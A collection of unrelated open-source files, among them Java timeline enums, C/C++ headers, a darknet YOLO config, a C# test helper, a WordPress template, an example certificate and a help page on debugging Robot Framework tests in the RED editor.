return code;
}
/** Localized title for UI */
@Override
public CharSequence title(Context context) {
if (titleResId == 0 || context == null) {
return this.code;
} else {
return context.getText(titleResId);
}
}
public CharSequence title(Context context, Object ... params) {
return StringUtil.format(context, titleResWithParamsId, params);
}
public boolean isSyncable() {
return getConnectionApiRoutine() != DUMMY_API;
}
public boolean isSyncedAutomaticallyByDefault() {
switch (this) {
case PRIVATE:
case FAVORITES:
case HOME:
case UNREAD_NOTIFICATIONS:
case SENT:
return true;
default:
return false;
}
}
public boolean isCombinedRequired() {
return this != SEARCH && isSelectable();
}
public boolean isSelectable() {
switch (this) {
case COMMANDS_QUEUE:
case CONVERSATION:
case FOLLOWERS:
case FRIENDS:
case MANAGE_TIMELINES:
case UNKNOWN:
case ACTORS:
case SENT_AT_ORIGIN:
return false;
default:
return true;
}
}
private static final List<TimelineType> defaultMyAccountTimelineTypes = Stream.of(
DRAFTS,
FAVORITES,
HOME,
INTERACTIONS,
NOTIFICATIONS,
OUTBOX,
PRIVATE,
SENT,
UNREAD_NOTIFICATIONS
).collect(Collectors.toList());
private static final Set<TimelineType> defaultOriginTimelineTypes = Stream.of(
EVERYTHING,
PUBLIC
).collect(Collectors.toSet());
public boolean isAtOrigin() {
return scope == ListScope.ORIGIN || scope == ListScope.ACTOR_AT_ORIGIN;
}
public boolean isForUser() {
return scope == ListScope.USER || scope == ListScope.ACTOR_AT_ORIGIN;
}
public boolean canBeCombinedForOrigins() {
switch (this) {
case EVERYTHING:
case PUBLIC:
case SEARCH:
return true;
default:
return false;
}
}
public boolean canBeCombinedForMyAccounts() {
switch (this) {
case PRIVATE:
case DRAFTS:
case FAVORITES:
case FOLLOWERS:
case FRIENDS:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case OUTBOX:
case SENT:
case UNREAD_NOTIFICATIONS:
return true;
default:
return false;
}
}
public boolean isPersistable() {
switch (this) {
case COMMANDS_QUEUE:
case CONVERSATION:
case MANAGE_TIMELINES:
case UNKNOWN:
case ACTORS:
case SENT_AT_ORIGIN:
return false;
default:
return true;
}
}
public boolean showsActivities() {
switch (this) {
case DRAFTS:
case EVERYTHING:
case FOLLOWERS:
case FRIENDS:
case GROUP:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case OUTBOX:
case PRIVATE:
case PUBLIC:
case SEARCH:
case SENT:
case SENT_AT_ORIGIN:
case UNREAD_NOTIFICATIONS:
return true;
case FAVORITES:
default:
return false;
}
}
public boolean isSubscribedByMe() {
switch (this) {
case PRIVATE:
case FAVORITES:
case FRIENDS:
case HOME:
case INTERACTIONS:
case NOTIFICATIONS:
case SENT:
case UNREAD_NOTIFICATIONS:
return true;
default:
return false;
}
}
public boolean hasActorProfile() {
switch (this) {
case FAVORITES:
case FOLLOWERS:
case FRIENDS:
case SENT:
case GROUP:
return true;
default:
return false;
}
}
@Override
public int getDialogTitleResId() {
return R.string.dialog_title_select_timeline;
}
public ApiRoutineEnum getConnectionApiRoutine() {
return connectionApiRoutine;
}
} | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY APPLE INC. ``AS IS'' AND ANY
* EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY
* OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#ifndef ComplexGetStatus_h
#define ComplexGetStatus_h
#include "JSCJSValue.h"
#include "ObjectPropertyConditionSet.h"
#include "PropertyOffset.h"
namespace JSC {
class CodeBlock;
class StructureChain;
// This class is useful for figuring out how to inline a cached get-like access. We
// say "get-like" because this is appropriate for loading the GetterSetter object in
// a put_by_id that hits a setter. Notably, this doesn't figure out how to call
// accessors, or even whether they should be called. What it gives us, is a way of
// determining how to load the value from the requested property (identified by a
// StringImpl* uid) from an object of the given structure in the given CodeBlock,
// assuming that such an access had already been cached by Repatch (and so Repatch had
// already done a bunch of safety checks). This doesn't reexecute any checks that
// Repatch would have executed, and for prototype chain accesses, it doesn't ask the
// objects in the prototype chain whether their getOwnPropertySlot would attempt to
// intercept the access - so this really is only appropriate if you already know that
// one of the JITOperations had OK'd this for caching and that Repatch concurred.
//
// The typical use pattern is something like:
//
// ComplexGetStatus status = ComplexGetStatus::computeFor(...);
// switch (status.kind()) {
// case ComplexGetStatus::ShouldSkip:
// // Handle the case where this kind of access is possibly safe but wouldn't
// // pass the required safety checks. For example, if an IC gives us a list of
// // accesses and one of them is ShouldSkip, then we should pretend as if it
// // wasn't even there.
// break;
// case ComplexGetStatus::TakesSlowPath:
// // This kind of access is not safe to inline. Bail out of any attempts to
// // inline.
// break;
// case ComplexGetStatus::Inlineable:
// // The good stuff goes here. If it's Inlineable then the other properties of
// // the 'status' object will tell you everything you need to know about how
// // to execute the get-like operation.
// break;
// }
class ComplexGetStatus {
public:
enum Kind {
ShouldSkip,
TakesSlowPath,
Inlineable
};
ComplexGetStatus()
: m_kind(ShouldSkip)
, m_offset(invalidOffset)
{
}
static ComplexGetStatus skip()
{
return ComplexGetStatus();
}
static ComplexGetStatus takesSlowPath()
{
ComplexGetStatus result;
result.m_kind = TakesSlowPath;
return result;
}
static ComplexGetStatus computeFor(
Structure* headStructure, const ObjectPropertyConditionSet&, UniquedStringImpl* uid);
Kind kind() const { return m_kind; }
PropertyOffset offset() const { return m_offset; }
const ObjectPropertyConditionSet& conditionSet() const { return m_conditionSet; }
private:
Kind m_kind;
PropertyOffset m_offset;
ObjectPropertyConditionSet m_conditionSet;
};
} // namespace JSC
#endif // ComplexGetStatus_h
| {
"pile_set_name": "Github"
} |
/* Copyright (C) 1991, 1992, 1993, 1996, 1997, 1998, 1999, 2001, 2002, 2003,
2005, 2007, 2009, 2010 Free Software Foundation, Inc.
This file is part of the GNU C Library.
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2, or (at your option)
any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software Foundation,
Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */
#ifndef _FNMATCH_H
#define _FNMATCH_H 1
#define _GL_ARG_NONNULL( x ) /**/
#ifdef __cplusplus
extern "C" {
#endif
/* We #undef these before defining them because some losing systems
(HP-UX A.08.07 for example) define these in <unistd.h>. */
#undef FNM_PATHNAME
#undef FNM_NOESCAPE
#undef FNM_PERIOD
/* Bits set in the FLAGS argument to `fnmatch'. */
#define FNM_PATHNAME (1 << 0) /* No wildcard can ever match `/'. */
#define FNM_NOESCAPE (1 << 1) /* Backslashes don't quote special chars. */
#define FNM_PERIOD (1 << 2) /* Leading `.' is matched only explicitly. */
#if !defined _POSIX_C_SOURCE || _POSIX_C_SOURCE < 2 || defined _GNU_SOURCE
# define FNM_FILE_NAME FNM_PATHNAME /* Preferred GNU name. */
# define FNM_LEADING_DIR (1 << 3) /* Ignore `/...' after a match. */
# define FNM_CASEFOLD (1 << 4) /* Compare without regard to case. */
# define FNM_EXTMATCH (1 << 5) /* Use ksh-like extended matching. */
#endif
/* Value returned by `fnmatch' if STRING does not match PATTERN. */
#define FNM_NOMATCH 1
/* This value is returned if the implementation does not support
`fnmatch'. Since this is not the case here it will never be
returned but the conformance test suites still require the symbol
to be defined. */
#ifdef _XOPEN_SOURCE
# define FNM_NOSYS (-1)
#endif
/* Match NAME against the file name pattern PATTERN,
returning zero if it matches, FNM_NOMATCH if not. */
extern int fnmatch (const char *__pattern, const char *__name,
int __flags)
_GL_ARG_NONNULL ((1, 2));
#ifdef __cplusplus
}
#endif
#endif /* fnmatch.h */
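Python's standard-library `fnmatch` module implements the same pattern language this header declares, which makes the semantics easy to poke at. One difference worth noting: Python exposes no `FNM_PATHNAME` flag, so `*` also matches `/`:

```python
from fnmatch import fnmatchcase

# Where the C API returns 0 on match and FNM_NOMATCH (1) otherwise,
# fnmatchcase returns True / False.
assert fnmatchcase("bar.foo", "*.foo")
assert not fnmatchcase("bar.foo", "*.bar")

# Without FNM_PATHNAME semantics, `*` crosses directory separators:
assert fnmatchcase("a/b.foo", "*.foo")
```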
| {
"pile_set_name": "Github"
} |
module.exports = {
urls: ['/add'],
routers: {
get: function (req, res) {
var username = "username" + new Date().getTime();
var password = "password" + new Date().getTime();
var User = req.models.User;
User.create({
username: username,
password: password
}).then(function(created) {
res.send(created);
});
}
}
};
| {
"pile_set_name": "Github"
} |
[net]
# Testing
batch=1
subdivisions=1
# Training
# batch=64
# subdivisions=8
width=224
height=224
channels=3
momentum=0.9
decay=0.0005
angle=0
saturation = 1.5
exposure = 1.5
hue=.1
learning_rate=0.001
burn_in=1000
max_batches = 500200
policy=steps
steps=400000,450000
scales=.1,.1
[convolutional]
batch_normalize=1
filters=32
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=64
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=64
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=128
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=256
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=3
stride=1
pad=1
activation=leaky
[maxpool]
size=2
stride=2
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=512
size=1
stride=1
pad=1
activation=leaky
[convolutional]
batch_normalize=1
filters=1024
size=3
stride=1
pad=1
activation=leaky
#######
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[route]
layers=-9
[convolutional]
batch_normalize=1
size=1
stride=1
pad=1
filters=64
activation=leaky
[reorg]
stride=2
[route]
layers=-1,-4
[convolutional]
batch_normalize=1
size=3
stride=1
pad=1
filters=1024
activation=leaky
[convolutional]
size=1
stride=1
pad=1
filters=425
activation=linear
[region]
anchors = 0.57273, 0.677385, 1.87446, 2.06253, 3.33843, 5.47434, 7.88282, 3.52778, 9.77052, 9.16828
bias_match=1
classes=80
coords=4
num=5
softmax=1
jitter=.3
rescore=1
object_scale=5
noobject_scale=1
class_scale=1
coord_scale=1
absolute=1
thresh = .6
random=1
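The `filters=425` on the last convolutional layer is not arbitrary: for a `[region]` layer it must equal `num * (classes + coords + 1)` — here 5 anchors × (80 classes + 4 box coordinates + 1 objectness score) = 425 — and the five stride-2 maxpool layers reduce the 224×224 input to a 7×7 output grid. A quick sanity check of both:

```python
def region_filters(num_anchors, classes, coords):
    # Each anchor predicts `coords` box values, one objectness score,
    # and `classes` class probabilities.
    return num_anchors * (classes + coords + 1)

def output_grid(input_size, stride2_pools):
    # Each stride-2 maxpool halves the spatial resolution.
    return input_size // (2 ** stride2_pools)

assert region_filters(num_anchors=5, classes=80, coords=4) == 425
assert output_grid(224, 5) == 7
```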
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE pkgmetadata SYSTEM "http://www.gentoo.org/dtd/metadata.dtd">
<pkgmetadata>
<maintainer type="project">
<email>haskell@gentoo.org</email>
<name>Gentoo Haskell</name>
</maintainer>
<longdescription>
A new all Haskell "tagged" DFA regex engine, inspired by libtre
</longdescription>
</pkgmetadata>
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License. See LICENSE in the project root for license information.
using System;
using System.Collections;
using System.Collections.Generic;
using FluentAssertions.Equivalency;
using Microsoft.R.ExecutionTracing;
using Microsoft.R.StackTracing;
using NSubstitute;
namespace Microsoft.R.Host.Client.Test {
internal class TracebackBuilder : IReadOnlyList<IRStackFrame> {
public struct AnyType {
public static implicit operator string (AnyType any) => "<ANY>";
public static implicit operator int (AnyType any) => -1;
}
public static readonly AnyType Any = default(AnyType);
private readonly List<IRStackFrame> _frames = new List<IRStackFrame>();
private Func<EquivalencyAssertionOptions<IRStackFrame[]>, EquivalencyAssertionOptions<IRStackFrame[]>> _config = options => options;
public int Count {
get {
return _frames.Count;
}
}
public IRStackFrame this[int index] {
get {
return _frames[index];
}
}
public IEnumerator<IRStackFrame> GetEnumerator() {
return _frames.GetEnumerator();
}
IEnumerator IEnumerable.GetEnumerator() {
return _frames.GetEnumerator();
}
public EquivalencyAssertionOptions<IRStackFrame[]> Configure(EquivalencyAssertionOptions<IRStackFrame[]> options) {
return _config(options);
}
public void Add(string fileName, int? lineNumber, string call, string environmentName) {
string itemPath = "[" + _frames.Count + "].";
var frame = Substitute.For<IRStackFrame>();
if (fileName != Any) {
frame.FileName.Returns(fileName);
}
if (lineNumber != Any) {
frame.LineNumber.Returns(lineNumber);
}
if (call != Any) {
frame.Call.Returns(call);
}
if (environmentName != Any) {
frame.EnvironmentName.Returns(environmentName);
}
_frames.Add(frame);
var oldConfig = _config;
_config = options => {
options = oldConfig(options);
if (fileName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.FileName));
}
if (lineNumber != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.LineNumber));
}
if (call != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.Call));
}
if (environmentName != Any) {
options = options.Including(ctx => ctx.SelectedMemberPath == itemPath + nameof(IRStackFrame.EnvironmentName));
}
return options;
};
}
public void Add(string fileName, int lineNumber, string call) {
Add(fileName, lineNumber, call, Any);
}
public void Add(string fileName, int lineNumber) {
Add(fileName, lineNumber, Any);
}
public void Add(SourceFile sourceFile, int lineNumber, string call, string environmentName) {
Add(sourceFile.FilePath, lineNumber, call, environmentName);
}
public void Add(SourceFile sourceFile, int lineNumber, string call) {
Add(sourceFile.FilePath, lineNumber, call);
}
public void Add(SourceFile sourceFile, int lineNumber) {
Add(sourceFile.FilePath, lineNumber);
}
public void Add(RSourceLocation location, int offset, string call) {
Add(location.FileName, location.LineNumber + offset, call);
}
public void Add(RSourceLocation location, int offset = 0) {
Add(location.FileName, location.LineNumber + offset, Any);
}
public void Add(RSourceLocation location, string call) {
Add(location.FileName, location.LineNumber, call);
}
}
}
| {
"pile_set_name": "Github"
} |
<?php
/*
Template Name: Page No Title
*/
get_header(); ?>
<?php
if( have_posts() ):
while( have_posts() ): the_post(); ?>
<h1>This is my Static Title</h1>
<small>Posted on: <?php the_time('F j, Y'); ?> at <?php the_time('g:i a'); ?>, in <?php the_category(); ?></small>
<p><?php the_content(); ?></p>
<hr>
<?php endwhile;
endif;
?>
<?php get_footer(); ?> | {
"pile_set_name": "Github"
} |
-----BEGIN CERTIFICATE-----
MIICQzCCAemgAwIBAgIQadOYD65Y3ytwRxqobjm2OTAKBggqhkjOPQQDAjBzMQsw
CQYDVQQGEwJVUzETMBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxMNU2FuIEZy
YW5jaXNjbzEZMBcGA1UEChMQb3JnNS5leGFtcGxlLmNvbTEcMBoGA1UEAxMTY2Eu
b3JnNS5leGFtcGxlLmNvbTAeFw0xODA0MTcwMTI2NDFaFw0yODA0MTQwMTI2NDFa
MHMxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpDYWxpZm9ybmlhMRYwFAYDVQQHEw1T
YW4gRnJhbmNpc2NvMRkwFwYDVQQKExBvcmc1LmV4YW1wbGUuY29tMRwwGgYDVQQD
ExNjYS5vcmc1LmV4YW1wbGUuY29tMFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAE
UPoXa8KJUqd4FXX6RvUsoKVdZHK1fQztQKhCyMOwFAVwhsGGEGp0Dw+vLbU7iE3R
bjjy0v9Wi9JoKh3ViSkMH6NfMF0wDgYDVR0PAQH/BAQDAgGmMA8GA1UdJQQIMAYG
BFUdJQAwDwYDVR0TAQH/BAUwAwEB/zApBgNVHQ4EIgQgPrnZYjpqEW5QkPNtCBin
uuk0WGD3EaqkfnkgZpBfyvQwCgYIKoZIzj0EAwIDSAAwRQIhAPVAZs87tHhDlreT
0iOmPJgv5XJ6s85uK59jHARu0YlvAiBlGksg8HkuJVK4GDCSPTFEINH4FgD8h3dO
Z11etT6MDw==
-----END CERTIFICATE-----
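A PEM block like the one above is simply a base64-encoded DER payload between `-----BEGIN/END-----` framing lines. A minimal sketch of unwrapping that framing (the `DEMO` payload below is a made-up stand-in, not the certificate above):

```python
import base64

def pem_body(pem_text):
    """Strip the BEGIN/END framing lines and base64-decode the payload."""
    body = [line for line in pem_text.strip().splitlines()
            if not line.startswith("-----")]
    return base64.b64decode("".join(body))

demo = ("-----BEGIN DEMO-----\n"
        + base64.b64encode(b"hello").decode() + "\n"
        + "-----END DEMO-----\n")
assert pem_body(demo) == b"hello"
# A real certificate's decoded payload starts with the ASN.1 SEQUENCE
# tag (0x30), which an X.509 parser would then interpret.
```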
| {
"pile_set_name": "Github"
} |
<html>
<head>
<link href="PLUGINS_ROOT/org.robotframework.ide.eclipse.main.plugin.doc.user/help/style.css" rel="stylesheet" type="text/css"/>
</head>
<body>
<a href="RED/../../../../../help/index.html">RED - Robot Editor User Guide</a> > <a href="RED/../../../../../help/user_guide/user_guide.html">User guide</a> > <a href="RED/../../../../../help/user_guide/launching.html">Launching Tests</a> > <a href="RED/../../../../../help/user_guide/launching/debug.html">Debugging Robot</a> >
<h2>Hitting a breakpoint during debug execution</h2>
<p>Whenever the debugger suspends the execution, a lot of useful information is presented to the user, and new
opportunities to influence the running tests appear. First of all, the toolbar buttons get activated:
</p>
<img src="images/debug_toolbar.png"/>
<p>moving from left to right:</p>
<ul>
<li><b>Skip All Breakpoints</b> - allows execution to continue without stopping on defined breakpoints
        (globally disables all breakpoints)
</li>
<li><b>Resume</b> - <kbd>F8</kbd> described in <a href="../exec_control.html">Controlling execution</a></li>
<li><b>Suspend</b> - as above</li>
<li><b>Terminate</b> - <kbd>Ctrl</kbd>+<kbd>F2</kbd> as above</li>
<li><b>Disconnect</b> - as above</li>
<li><b>Step Into</b> - <kbd>F5</kbd> - each <kbd>F5</kbd> key press will execute the active line and move to the
        next one. If the active line contains a keyword or an embedded test case, the test executor will jump into that
        item and execute it line by line. To exit from an entered item use Step Return (<kbd>F7</kbd>)</li>
<li><b>Step Over</b> - <kbd>F6</kbd> - each <kbd>F6</kbd> key press will execute the active line and move to the next
        one. If a keyword exists in the current line, the keyword result will be returned without going into the keyword content</li>
<li><b>Step Return</b> - <kbd>F7</kbd> - allows returning to the main test case execution from an embedded test case
        or keyword if Step Into was used before</li>
</ul>
<h3>Debug view</h3>
<p>When execution is suspended, the <b>Debug</b> view shows all the frames on the current path in the execution tree.
The bottom part of this path directly corresponds to the tree which can be seen in the <b>Execution</b> view, as
depicted below:
</p>
<img src="images/debug_debug_view.png"/><br/>
<img src="images/debug_execution_view.png"/>
<p>The bottom frame corresponds to the <code>Project</code> suite (this is a directory in the file system, so a
little directory decoration is visible). The next frame corresponds to the <code>Calculations</code> suite (the
<code>calculations.robot</code> file) and the frame above it represents the <code>Divisions</code> test inside that
suite. The remaining frames do not correspond to any node inside the execution tree visible in the <b>Execution</b> view. It
can be read that the suspended execution is currently inside the <code>Divisions</code> test at the instruction in line
<code>35</code>, which called the keyword <code>Divide</code>, which then called another keyword,
<code>BinaryDivision</code>, from line <code>57</code>, which finally called the library keyword <code>Evaluate</code>
coming from the <code>BuiltIn</code> library at line <code>61</code>.
</p>
<p>Additionally you may see that there is a single execution thread (RF executes tests in a single thread); the
execution is suspended and the agent is communicating with RED over localhost at port <code>59344</code>.
</p>
<h3 id="debug_shell_view">Debug Shell view</h3>
<p>Whenever execution is suspended and a frame inside the <b>Debug</b> view is selected, it is possible to use the
<b>Debug Shell</b> view in order to evaluate expressions. The view is not opened in the <b>Debug</b>
perspective by default and needs to be opened using <a class="command" href="javascript:executeCommand('org.eclipse.ui.views.showView(org.eclipse.ui.views.showView.viewId=org.robotframework.ide.DebugShell)')">
Window -> Show View -> Other... -> Robot -> Debug Shell</a>.
</p>
<img src="images/debug_shell.png"/>
<p>The view allows evaluating expressions in 3 modes:
</p>
<ul>
<li><b>ROBOT</b> in which <b>keyword</b> calls can be executed; under the hood it uses the <code>BuiltIn.Run Keyword</code>
    keyword from the standard library,
</li>
<li><b>VARIABLE</b> in which variable-like expressions can be evaluated,
</li>
<li><b>PYTHON</b> which allows to evaluate Python expressions; under the hood the expression is passed to
<code>BuiltIn.Evaluate</code> keyword which effectively calls Python <code>eval()</code>.
</li>
</ul>
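<p>Since the <b>PYTHON</b> mode ultimately delegates to Python's built-in <code>eval()</code> (via
<code>BuiltIn.Evaluate</code>), its behavior can be approximated with plain Python. The sketch below is only an
illustration with a made-up variable namespace, not RED's actual implementation:</p>

```python
# Rough sketch of PYTHON-mode evaluation: an expression string is evaluated
# against a namespace holding Robot variables (the names here are hypothetical).
namespace = {"scalar": 100, "items": [1, 2, 3]}

# eval() injects builtins into the globals dict automatically, so len() works.
result = eval("scalar + len(items)", namespace)
print(result)  # 103
```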
<p>Switching between modes is done using the view buttons or through the <kbd>Ctrl + T</kbd> shortcut. The view
remembers the last 5 executed expressions, so it is possible to switch between them using the up/down arrows.
In <b>ROBOT</b> and <b>PYTHON</b> modes it is possible to continue an expression across multiple lines using the
<kbd>Shift+Enter</kbd> keys.
</p>
<h3>Variables view</h3>
<p>Whenever you select a frame inside the <b>Debug</b> view, the Robot variables defined in it are shown in the
<b>Variables</b> view. This view handles scalar, list and dictionary variables. A scalar variable only shows
its value, while the other two types also show their contents. Depending on the type of
variable, the icon has a different color assigned, as visible on the image below:
</p>
<img src="images/debug_variables.png"/>
<p>As you can see, some of the variables are displayed under the <b>Automatic Variables</b> node. This is the place
where all the variables built into Robot are gathered together (refer to the <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#built-in-variables" target="_blank">
RF User Guide</a>). All the user variables are displayed at top level.
</p>
<p>Variable scope (see the <a class="external" href="http://robotframework.org/robotframework/latest/RobotFrameworkUserGuide.html#variable-scopes" target="_blank">
User Guide</a> on this topic) is reflected in this view using an icon decoration: <b>G</b>, <b>S</b>, <b>T</b> or <b>L</b>
is placed on the variable icon for the <b>Global</b>, <b>Suite</b>, <b>Test</b> and <b>Local</b> scopes. You may find
that global-scoped variables are visible in every single stack frame, suite-scoped variables only in the suite frame
and the frames below, test-scoped variables only in the test frame and below, while local-scoped variables are visible
only in the current frame. Of course, for example, the <code>${SUITE_NAME}</code> automatic variable (which has suite scope)
may be visible for all suite frames; however, it may have different values as the suites are nested.
</p>
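<p>The scope rules described above can be pictured as a chain of namespaces searched from the most local frame
outwards. The following is a minimal, hypothetical sketch of such a lookup (the variable values are invented for
illustration), not how RED stores variables internally:</p>

```python
# Hypothetical scope chain: local -> test -> suite -> global, searched in order.
scopes = {
    "global": {"${GLOBAL}": "g"},
    "suite": {"${SUITE_NAME}": "Project"},
    "test": {"${TEST_NAME}": "Divisions"},
    "local": {"${scalar}": 100},
}

def resolve(name):
    # the most local scope wins; outer scopes act as fallbacks
    for scope in ("local", "test", "suite", "global"):
        if name in scopes[scope]:
            return scopes[scope][name]
    raise KeyError(name)

print(resolve("${scalar}"))      # 100
print(resolve("${SUITE_NAME}"))  # Project
```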
<p>For both dictionaries and lists the actual type of the Python object is written in the <b>Value</b> column. On the picture above,
<b>DotDict[3]</b> for the <code>&{dictionary}</code> variable means that in Python this object has the type <b>DotDict</b>
and that there are <code>3</code> elements inside it. Lists are labeled in the same way.
Additionally, you may display the <b>Actual Type</b> column, which also shows the types of
objects for scalar variables and for objects inside lists/dictionaries. To do it, click the arrow icon in the top
right corner of the Variables view, choose <b><code>Layout -> Select Columns...</code></b> and select the <b>Actual Type</b>
column.
</p>
<p>Variables are sent from Robot to RED every time RED is ordered to suspend the execution. Sometimes you may observe
that variables are highlighted in yellow:
</p>
<img src="images/debug_vars_changed.png"/>
<p>
This means that the variable <code>${scalar}</code> either changed its value compared to the previous time variables
were sent to RED, or it did not exist previously. The same highlighting is used if you manually change the value.
</p>
<h3>Changing variables</h3>
<p>Apart from displaying variables, it is possible to change their values when execution gets suspended.
This can be done through the <b>Variables</b> view in 3 ways:
</p>
<ul>
<li>by editing the value cell in the <b>Value</b> column,
</li>
<li>by choosing <b>Change Value...</b> from context menu of selected variable,
</li>
<li>inside the panel at the bottom of <b>Variables</b> view.
</li>
</ul>
<h4>Variable types</h4>
<p>Scalar variables are assigned the provided value. In case of lists or dictionaries, just use the usual Robot Framework
separators in order to provide a whole new list/dictionary. For example, writing:
</p>
<code>1 2 3 4
</code>
<p>for a list variable will create a new list containing 4 elements, while writing:
</p>
<code>a=1 b=2 c=3
</code>
<p>for a dictionary variable will create a new dictionary containing 3 key-value pairs. Alternatively, list or
dictionary elements may be provided in comma-separated syntax using brackets:</p>
<code>[1,2,3,4]</code> and: <code>{a=1,b=2,c=3}</code>
<p>for lists and dictionaries respectively.
</p>
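<p>The bracketed syntax is simple enough to sketch a parser for. The function below is a hypothetical illustration of
how such values could be split into list elements and key-value pairs; it is not RED's actual parsing code:</p>

```python
# Hypothetical parser for the bracketed value syntax described above.
def parse_value(text):
    text = text.strip()
    if text.startswith("[") and text.endswith("]"):
        # comma-separated list elements
        return [item.strip() for item in text[1:-1].split(",")]
    if text.startswith("{") and text.endswith("}"):
        # comma-separated key=value pairs
        pairs = (item.split("=", 1) for item in text[1:-1].split(","))
        return {key.strip(): value.strip() for key, value in pairs}
    return text  # plain scalar value

print(parse_value("[1,2,3,4]"))      # ['1', '2', '3', '4']
print(parse_value("{a=1,b=2,c=3}"))  # {'a': '1', 'b': '2', 'c': '3'}
```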
<dl class="note">
<dt>Note</dt>
<dd>Besides changing the values of top-level variables, it is also possible to change the values inside lists or
      dictionaries in the way described above.
   </dd>
</dl>
<p>If the value changes successfully, the whole variable will be highlighted in yellow; otherwise
you will be presented with an error message.
</p>
<h3>Editor</h3>
<p>After suspension you may open the source file related to any frame by double-clicking on it. By default the editor for
the top frame is opened. Of course some frames may not have a related source (for example a frame representing a suite made
from a directory). Remember that the RED debugger only supports debugging Robot code, so you will not be able to debug
Python code of library keywords (you may, however, set up a session in which <a href="robot_python_debug.html">both
RF & Python code is debugged</a>). Frames created for library keywords have a special kind of editor which
allows finding the source code of the keyword.
</p>
<img src="images/debug_editor.png"/>
<h4>Instruction pointers</h4>
<p>The editor opened for any frame displays an <b>instruction pointer</b> - by default it is a green background
displayed in the line related to the chosen stack frame. You may also notice that the instruction pointer for the
top frame is a bit darker than the pointers for other frames. The way the instruction pointers are displayed can be configured
in preferences: <code><a class="command" href="javascript:executeCommand('org.eclipse.ui.window.preferences(preferencePageId=org.eclipse.ui.editors.preferencePages.Annotations)')">
General > Editors > Text Editors > Annotations</a></code> (change the <b>Debug Call Stack</b> annotation for
an ordinary frame or <b>Debug Current Instruction Pointer</b> for the top frame)
</p>
<p>You may also encounter a situation in which the current frame is somehow erroneous. This is rather unusual
in local launches (although it may happen) but can be more common in remote debugging sessions. There may be many
different causes of such debugging errors, but in general they happen when the remotely executing code differs
from the code found locally in the RED workspace. For example, the picture below presents a situation in which the
remotely executing <code>types.robot</code> suite calls the <code>Log</code> keyword, but in the local code there is a call to
the <code>Log many</code> keyword. As you can see, the instruction pointer in this situation is red and a problem
explanation is shown when you hover the cursor over the problematic line.
</p>
<img src="images/debug_editor_error.png"/>
<p>Similarly to the usual instruction pointer, the look of the erroneous annotations can also be changed in preferences
(look for <b>Red Erroneous Debug Call Stack</b> and <b>Red Erroneous Debug Current Instruction Pointer</b>).
</p>
<h4>Showing variables</h4>
